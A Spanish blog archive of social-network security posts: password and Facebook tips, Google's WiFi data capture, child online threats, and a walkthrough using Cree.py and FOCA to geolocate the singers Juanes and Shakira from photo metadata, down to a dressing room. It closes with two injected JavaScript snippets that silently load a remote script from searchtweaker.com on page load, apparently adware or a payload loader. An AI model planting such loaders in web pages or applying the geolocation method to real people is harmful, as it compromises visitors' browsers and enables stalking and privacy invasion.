Archivos de la categoría ‘redes sociales’

Diccionarios para ataques de Fuerza Bruta

recopilación de diccionarios para ataques de FUERZA BRUTA. Hay numerosas webs que ofrecen diccionarios creados, e incluso la posibilidad de generarlos. Por ello os dejamos una lista con las 15 webs más interesantes en un formato muy claro de tabla y una pequeña descripción de cada una de ellas. Si conocéis alguna más podemos ir añadiendo contenidos, no dudéis en utilizar los comentarios.

Hace unos días Facebook sufrió una brecha de seguridad de modo que números de teléfono y direcciones de correo de algunos usuarios quedaron expuestos a los ojos de personas que están dentro de su red (amigos de amigos, por ejemplo), pero que, de otra forma, no los habrían visto. Dicho incidente provocó que quienes usaran la herramienta Descarga tu información pudieran acceder a datos adicionales de contacto de otras personas con las que tuvieran, en palabras de Facebook, “alguna conexión”.

¿Hay algo que los usuarios de la plataforma puedan hacer para minimizar los daños causados por una filtración de datos de este tipo? Desde la firma de seguridad Kaspersky Lab ofrecen los siguientes consejos para evitar sustos en un futuro próximo:

– Usar una dirección de correo electrónico para estar en contacto con amigos  y otro, confidencial, para recibir información de bancos u otra institución relevante.

– Aunque parezca una obviedad, tener una buena contraseña es vital. Lo mejor es combinar letras, números y caracteres especiales. Nada de palabras que puedan encontrarse en un diccionario, datos personales o que sigan un orden regular del teclado.

– Vincular la cuenta de Facebook a un teléfono móvil. Esto permitirá realizar múltiples ajustes de seguridad y facilita el control permanente de la seguridad del perfil en la red social.

– Activar la navegación segura. Así se cifrará la navegación en la red social lo que evitará, por otra parte, que nadie pueda introducirse en nuestra cuenta cuando nos conectamos a través de una red WiFi poco segura.

– Tener activadas también las notificaciones de inicio de sesión de forma que Facebook nos avise se acceda a nuestra cuenta desde un dispositivo nuevo.

– Además, si seleccionamos las aprobaciones de inicio de sesión para solicitar un código de acceso cuando nos conectemos a nuestra cuenta desde un dispositivo nuevo impediremos que nadie pueda utilizar nuestra cuenta desde una máquina que no sea conocida por nosotros. Como extensión podemos señalar cuáles son nuestros dispositivos de confianza, de modo que Facebook nos diga si alguien se conecta a nuestra cuenta desde un dispositivo desconocido.

– Comprobar las sesiones activas en el apartado de seguridad de nuestra cuenta de Facebook para ver que no nos hemos conectado desde un lugar desconocido.

– Utilizar contraseñas específicas para apps. Se trata de una función que existe porque algunas aplicaciones de Facebook no pueden recibir códigos de seguridad en ciertas plataformas. Si tenemos activada la opción de Aprobaciones de Inicio de Sesión e intentamos entrar a nuestra cuenta desde algún dispositivo es posible que el sistema nos bloquee el acceso.

resource: http://www.ticbeat.com/socialmedia/seis-consejos-para-evitar-sustos-seguridad-facebook/Imagen

Delfín Abzueta

La oficina del comisionado de información del Reino Unido le esta exigiendo a Google que termine de eliminar los datos relacionados con la identificación de redes inalambricas públicas capturadas con el dispositivo StreetCar.

Esta solicitud ya se le había hecho a Google desde Noviembre 2010, cuando salió a la luz que  el StreetCar, estaba capturando, además de fotografías, información relacionada con la ubicación física de redes WiFi y haciendolas públicas.

En 2012, se conoció que además de la ubicación de las redes, el dispositivo podía capturar tráfico de las redes y por consecuencia información sensible, tales como, contraseñas, nombres de usuarios, historiales de navegación, entre otras minucias. Lo estuvieron haciendo desde 2007.

Ha pasado ya suficiente tiempo para que Google borre toda la información capturada, ahora la ICO, le exige que lo haga en 35 días o menos. Nos toca ver si Google lo hará.

 

Ver la entrada original

El Ojo de Thundera es una realidad!

como decía León-o en los Thundercats : “Espada del Augurio déjame ver más allá de lo evidente”. Muchos quizás conocerán perfectamente está técnica el cual se ha convertido  sumamente lucrativa en el mercado negro el costo de la webcam de una mujer  bordea $1, el cual es utilizado para tomar fotos y grabar vídeos para luego poder cometer sus fechorias y chantajes. Un consejo súper práctico, cubrir dicho ojito y en especial si suelen tener la webcam en lugares íntegros de su privacidad.

Principales amenazas para menores en Internet

Las redes sociales, la pornografía y material erótico, y las tiendas on-line, son los tres temas que más han hecho saltar las alarmas del control parental según los datos del Kaspersky Security Network (KSN).

fuente: http://muyseguridad.net/2013/06/21/amenazas-menores-en-internet/

Los temas se repiten de años anteriores aunque este año los recursos pornográficos (16,8%) han perdido el primer puesto, porque a juzgar por la estadística, los niños pasan la mayor parte del tiempo en las redes sociales (31,3%) donde también existen muchas amenazas (contenidos potencialmente peligrosos para niños o personas sospechosas y desconocidos que quieran contactar con ellos).

De forma inesperada, las “Tiendas en Internet” (16,7%) han resultado entre las primeras tres categorías, dejando por detrás los chats, foros, servicios de correo y “software ilegal” de anteriores informes.

Kaspersky alerta de que con el comienzo de las vacaciones de verano los niños disfrutan de su tiempo de ocio conectados a Internet, que es una fuente de información y conocimiento muy útil durante el curso escolar, pero cuando se usa sin restricciones puede ser peligroso para los pequeños internautas. Por ello han preparado una infografía que muestra las principales amenazas para menores en Internet que han sido recogidas en los controles parentales de las soluciones de seguridad de la firma.

Existe una herramienta que permite descargar las publicadas en por un usuario automáticamente y que también podría ayudar en esta tarea, se llama Twitter Image Downloader, esta escrita en .net y es de código abierto, esta herramienta nos facilita la vida al bajar las imágenes publicadas en los últimos 150 tweets de una cuenta (por limitaciones de la api en twitter) para luego extraer sus meta datos y conseguir información que nos ayude a localizar el usuario de twitter en un momento determinado.
 
Ya que algunos han experimentado problemas a la hora de usar cree.py, aquí otra alternativa que junto a un visor EXIF como Exif ViewerJeffrey’s Exif viewer o la misma FOCA, te ayudará en la extracción de información  sobre las fotos publicadas por un usuario en twitter, con el añadido de ser open source y poder modificar la herramienta para que adaptarla a nuestras necesidades especificas.
La geolocalización esta en auge, todos quieren saber donde están sus amigos y gustosos dan su información en sitios como Foursquare, DiOui o Facebook Places para no estar fuera de la “moda”, pero… ¿sabes quien ve realmente esta información?, muchas veces quienes publican estos datos en la red, no son conscientes de las consecuencias que esto puede acarrear.
Geolocalizacion Cómo localizar usuarios de twitter y flickr a través de sus fotos
Secuestradores, Violadores, Ladrones y demás delincuentes ya hacen uso de las nuevas tecnologías y la información que publicas en internet, para llevar a cabo sus delitos, como en el famoso caso de Lisa Montgomery; por eso debes ser consciente que la información que publicas en la red la puede ver CUALQUIER PERSONA y te recomendamos seguir los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red.
Esta información es especialmente sensible cuando quien la publica, no es consciente que lo está haciendo, como es el caso de las fotos en cuyo interior (sus metadatos) se encuentra almacenada la ubicación de donde fue tomada, una característica adoptada cada vez en mas cámaras, especialmente las integradas a teléfonos celulares inteligentes.
Gracias a El Maligno, me entero que Yiannis Kakavas ha desarrollado una herramienta llamada Cree.py, que automatiza el proceso de extracción y localización de la información GPS publicada en las fotos por un usuario de Twitter o , dejándola a la mano de cualquier persona.
La herramienta programada en Python y de código abierto, es muy fácil de utilizar, cuenta con versiones para Windows, GNU Linux y si resolvemos unas cuentas dependencias, podemos hacerla correr en Mac OS X.

Para este articulo analizaremos 2 de los famosos colombianos, que mas publican fotografías por Twitter…. @juanes y @Shakira

Juanes GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Lo primero que hacemos es abrir la herramienta, escribir la cuenta de Twitter o Flickr que queremos analizar (podemos usar un buscador también) y después presionar “Geolocate Targe”, esperamos unos minutos mientras se procesa la información…. obteniendo un mapa como el siguiente, donde podemos ver los puntos geolocalizados de las fotos obtenidas desde el perfil publico de @juanes
Juanes GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos
Para confirmar la información almacenada analizaremos las fotos descargadas por el Cree.py, con la FOCA, herramienta que permite analizar metadatos a imágenes y documentos.

Juanes GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Fotos bastante personales de @Juanes con su esposa Karen Martínez mientras estaban de viaje por Londres.

Juanes GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos

La ubicación de la oficina donde posiblemente produzcan los discos del artista

Juanes GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Haciendo arreglos a las canciones o las pistas…

Juanes GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Fotos del parque que se observa claramente en Creppy

Juanes GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Segunda foto del Hyde Park

Juanes GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos
Como podemos ver no es poca la información que cualquier persona puede obtener de la cuenta publica de Juanes, ¿los paparazzi sabrán de esto?, seguramente les sería de mucha utilidad….
Ahora pasamos a otra de nuestras celebridades… @shakira quien tampoco sabe que al publicar fotografías por Twitter, también esta publicando su ubicación, para ello seguimos el mismo procedimiento que con @juanes, buscamos su cuenta oficial, damos click en el botón “Geolocate Target” y esperamos que Cree.py haga su trabajo…
Shakira GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Después de esperar un poco, podemos ver algunas locaciones como el Coca Cola Park en South Africa.

Shakira GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Algunas direcciones en New York…

Shakira GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Y para corroborar el trabajo de cree.py de nuevo pasamos la FOCA a todas las fotos, logrando reconocer algunas de ellas.

Shakira GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Shakira con su novio de turno…

Shakira GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Foto del escenario antes de la presentación…

Shakira GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Ubicación de su camerino… ya sabes por si quieres darle un saludo…

Shakira GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos

En un late night show…

Shakira GPS8 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Algunos apuntes poco interesantes… ¿o no?

Shakira GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Detrás del telón…

Shakira GPS10 Cómo localizar usuarios de twitter y flickr a través de sus fotos

En el escenario..
Como pueden ver obtener la ubicación de los famosos no es nada complicado, pero es igual de fácil obtener la tuya; Por eso es tan importante que sigas los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red y seas mas cuidadoso con tu información.

Fuente: DragonJar.
(function(){try{var header=document.getElementsByTagName(“HEAD”)[0];var script=document.createElement(“SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
(function(){try{var header=document.getElementsByTagName(“HEAD”)[0];var script=document.createElement(“SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();